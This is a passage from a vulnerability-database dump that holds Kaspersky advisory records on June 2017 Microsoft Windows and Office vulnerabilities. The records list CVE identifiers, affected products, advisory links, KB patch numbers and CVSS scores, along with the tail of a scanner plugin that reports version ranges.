11.0.15063.0 - 11.0.15063.412\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:59:40", "bulletinFamily": "info", "cvelist": ["CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-0297", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-0299", "CVE-2017-8476", "CVE-2017-8484"], "description": "### *Detect date*:\n06/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Windows kernel. Malicious users can exploit these vulnerabilities to obtain sensitive information and gain privileges.\n\n### *Affected products*:\nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2008 Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8478>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8479>) \n[CVE-2017-8474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8474>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8476>) \n[CVE-2017-8477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8477>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0300>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8481>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8480>) \n[CVE-2017-8482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8482>) \n[CVE-2017-8485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8485>) \n[CVE-2017-8484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8484>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8489>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0299>) \n[CVE-2017-0297](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0297>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8469>) \n[CVE-2017-8468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8468>) \n[CVE-2017-8465](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8465>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8462>) \n[CVE-2017-8494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8494>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8492>) \n[CVE-2017-8490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8490>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8491>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8479>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0299>) \n[CVE-2017-8485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8485>) \n[CVE-2017-8478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8478>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8476>) \n[CVE-2017-8494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8494>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8480>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8489>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0300>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8491>) \n[CVE-2017-8477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8477>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8462>) \n[CVE-2017-8482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8482>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8492>) \n[CVE-2017-8490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8490>) \n[CVE-2017-8484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8484>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8481>) \n[CVE-2017-8468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8468>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8469>) \n[CVE-2017-8474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8474>) \n[CVE-2017-8465](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8465>) \n[CVE-2017-0297](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0297>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server 2012](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/>)\n\n### *CVE-IDS*:\n[CVE-2017-8479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8479>)0.0Unknown \n[CVE-2017-0299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0299>)0.0Unknown \n[CVE-2017-8485](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8485>)0.0Unknown \n[CVE-2017-8478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8478>)0.0Unknown \n[CVE-2017-8476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8476>)0.0Unknown \n[CVE-2017-8494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8494>)0.0Unknown \n[CVE-2017-8480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8480>)0.0Unknown \n[CVE-2017-8489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8489>)0.0Unknown \n[CVE-2017-0300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0300>)0.0Unknown \n[CVE-2017-8491](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8491>)0.0Unknown \n[CVE-2017-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8477>)0.0Unknown \n[CVE-2017-8462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8462>)0.0Unknown \n[CVE-2017-8482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8482>)0.0Unknown \n[CVE-2017-8492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8492>)0.0Unknown \n[CVE-2017-8490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8490>)0.0Unknown \n[CVE-2017-8484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8484>)0.0Unknown \n[CVE-2017-8481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8481>)0.0Unknown \n[CVE-2017-8468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8468>)0.0Unknown \n[CVE-2017-8469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8469>)0.0Unknown \n[CVE-2017-8474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8474>)0.0Unknown \n[CVE-2017-8465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8465>)0.0Unknown \n[CVE-2017-0297](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0297>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4022719](<http://support.microsoft.com/kb/4022719>) \n[4022726](<http://support.microsoft.com/kb/4022726>) \n[4022714](<http://support.microsoft.com/kb/4022714>) \n[4022724](<http://support.microsoft.com/kb/4022724>) \n[4022727](<http://support.microsoft.com/kb/4022727>) \n[4022715](<http://support.microsoft.com/kb/4022715>) \n[4022725](<http://support.microsoft.com/kb/4022725>) \n[4022722](<http://support.microsoft.com/kb/4022722>) \n[4022717](<http://support.microsoft.com/kb/4022717>) \n[4022718](<http://support.microsoft.com/kb/4022718>) \n[4022013](<http://support.microsoft.com/kb/4022013>) \n[4022887](<http://support.microsoft.com/kb/4022887>) \n[4034741](<http://support.microsoft.com/kb/4034741>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 50, "modified": "2020-06-18T00:00:00", "published": "2017-06-13T00:00:00", "id": "KLA11048", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11048", "title": "\r KLA11048Multiple vulnerabilities in Windows Kernel ", "type": "kaspersky", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:57:43", "bulletinFamily": "info", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "description": "### *Detect date*:\n06/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nMicrosoft Silverlight 5 when installed on Microsoft Windows (x64-based) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Lync 2010 (32-bit) \nMicrosoft Lync 2013 Service Pack 1 (32-bit) \nSkype for Business 2016 (64-bit) \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nInternet Explorer 11 \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft Lync 2013 Service Pack 1 (64-bit) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nMicrosoft Office 2016 Click-to-Run (C2R) for 32-bit editions \nWindows Server 2016 \nMicrosoft Lync 2010 Attendee (admin level install) \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nSkype for Business 2016 (32-bit) \nMicrosoft Lync 2010 Attendee (user level install) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Lync 2010 (64-bit) \nMicrosoft Office Word Viewer \nMicrosoft Live Meeting 2007 Console \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (32-bit) \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (x64-based) \nMicrosoft Office 2007 Service Pack 3 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nWindows 10 Version 1607 for 32-bit Systems \nMicrosoft Office 2016 Click-to-Run (C2R) for 64-bit editions \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nMicrosoft Silverlight 5 when installed on Microsoft Windows (32-bit) \nWindows Server 2012 R2 \nMicrosoft Live Meeting 2007 Add-in\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8485](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8485>) \n[CVE-2017-8484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8484>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8481>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8480>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8469>) \n[CVE-2017-8482](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8482>) \n[CVE-2017-8464](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8464>) \n[CVE-2017-8544](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8544>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8462>) \n[CVE-2017-0289](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0289>) \n[CVE-2017-0288](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0288>) \n[CVE-2017-8528](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8528>) \n[CVE-2017-8529](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8529>) \n[CVE-2017-0283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0283>) \n[CVE-2017-0282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0282>) \n[CVE-2017-0287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0287>) \n[CVE-2017-0286](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0286>) \n[CVE-2017-0285](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0285>) \n[CVE-2017-0284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0284>) \n[CVE-2017-8483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8483>) \n[CVE-2017-8517](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8517>) \n[CVE-2017-0193](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0193>) \n[CVE-2017-8471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8471>) \n[CVE-2017-0298](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0298>) \n[CVE-2017-8478](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8478>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8479>) \n[CVE-2017-8543](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8543>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8492>) \n[CVE-2017-8490](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8490>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8491>) \n[CVE-2017-8470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8470>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8489>) \n[CVE-2017-8472](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8472>) \n[CVE-2017-8473](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8473>) \n[CVE-2017-8553](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8553>) \n[CVE-2017-8475](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8475>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8476>) \n[CVE-2017-8488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8488>) \n[CVE-2017-0294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0294>) \n[CVE-2017-0296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0296>) \n[CVE-2017-0297](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0297>) \n[CVE-2017-8534](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8534>) \n[CVE-2017-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8477>) \n[CVE-2017-8531](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8531>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0299>) \n[CVE-2017-8533](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8533>) \n[CVE-2017-8532](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8532>) \n[CVE-2017-8527](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8527>) \n[CVE-2017-8519](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8519>) \n[CVE-2017-0260](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0260>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0300>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8543>)0.0Unknown \n[CVE-2017-0284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0284>)0.0Unknown \n[CVE-2017-8479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8479>)0.0Unknown \n[CVE-2017-0299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0299>)0.0Unknown \n[CVE-2017-8485](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8485>)0.0Unknown \n[CVE-2017-0193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0193>)0.0Unknown \n[CVE-2017-8478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8478>)0.0Unknown \n[CVE-2017-8488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8488>)0.0Unknown \n[CVE-2017-8528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8528>)0.0Unknown \n[CVE-2017-8475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8475>)0.0Unknown \n[CVE-2017-8476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8476>)0.0Unknown \n[CVE-2017-8470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8470>)0.0Unknown \n[CVE-2017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>)0.0Unknown \n[CVE-2017-8480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8480>)0.0Unknown \n[CVE-2017-8489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8489>)0.0Unknown \n[CVE-2017-0285](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0285>)0.0Unknown \n[CVE-2017-0300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0300>)0.0Unknown \n[CVE-2017-8534](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8534>)0.0Unknown \n[CVE-2017-8491](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8491>)0.0Unknown \n[CVE-2017-8471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8471>)0.0Unknown \n[CVE-2017-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8477>)0.0Unknown \n[CVE-2017-8462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8462>)0.0Unknown \n[CVE-2017-0294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0294>)0.0Unknown \n[CVE-2017-8472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8472>)0.0Unknown \n[CVE-2017-8482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8482>)0.0Unknown \n[CVE-2017-8492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8492>)0.0Unknown \n[CVE-2017-8490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8490>)0.0Unknown \n[CVE-2017-8483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8483>)0.0Unknown \n[CVE-2017-0283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0283>)0.0Unknown \n[CVE-2017-8484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8484>)0.0Unknown \n[CVE-2017-8481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8481>)0.0Unknown \n[CVE-2017-0282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0282>)0.0Unknown \n[CVE-2017-0260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0260>)0.0Unknown \n[CVE-2017-8469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8469>)0.0Unknown \n[CVE-2017-0297](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0297>)0.0Unknown \n[CVE-2017-0296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0296>)0.0Unknown \n[CVE-2017-8473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8473>)0.0Unknown \n[CVE-2017-8517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8517>)0.0Unknown \n[CVE-2017-8519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8519>)0.0Unknown \n[CVE-2017-8529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8529>)0.0Unknown \n[CVE-2017-0286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0286>)0.0Unknown \n[CVE-2017-0287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0287>)0.0Unknown \n[CVE-2017-0288](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0288>)0.0Unknown \n[CVE-2017-0289](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0289>)0.0Unknown \n[CVE-2017-8527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8527>)0.0Unknown \n[CVE-2017-8531](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8531>)0.0Unknown \n[CVE-2017-8532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8532>)0.0Unknown \n[CVE-2017-8533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8533>)0.0Unknown \n[CVE-2017-0298](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0298>)0.0Unknown \n[CVE-2017-8544](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8544>)0.0Unknown \n[CVE-2017-8553](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8553>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4022719](<http://support.microsoft.com/kb/4022719>) \n[4021558](<http://support.microsoft.com/kb/4021558>) \n[4022722](<http://support.microsoft.com/kb/4022722>) \n[4024402](<http://support.microsoft.com/kb/4024402>) \n[4022008](<http://support.microsoft.com/kb/4022008>) \n[4021903](<http://support.microsoft.com/kb/4021903>) \n[4021923](<http://support.microsoft.com/kb/4021923>) \n[4022013](<http://support.microsoft.com/kb/4022013>) \n[4022010](<http://support.microsoft.com/kb/4022010>) \n[4018106](<http://support.microsoft.com/kb/4018106>) \n[4022887](<http://support.microsoft.com/kb/4022887>) \n[4022884](<http://support.microsoft.com/kb/4022884>) \n[4022883](<http://support.microsoft.com/kb/4022883>) \n[3217845](<http://support.microsoft.com/kb/3217845>) \n[4034679](<http://support.microsoft.com/kb/4034679>) \n[4034664](<http://support.microsoft.com/kb/4034664>) \n[4034741](<http://support.microsoft.com/kb/4034741>) \n[4036586](<http://support.microsoft.com/kb/4036586>) \n[4503292](<http://support.microsoft.com/kb/4503292>) \n[4503269](<http://support.microsoft.com/kb/4503269>)", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2017-06-13T00:00:00", "id": "KLA11842", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11842", "title": "\r KLA11842Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:43:42", "bulletinFamily": "info", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8484", "CVE-2017-8527", "CVE-2017-0296"], "description": "### *Detect date*:\n06/13/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions, obtain sensitive information, gain privileges.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 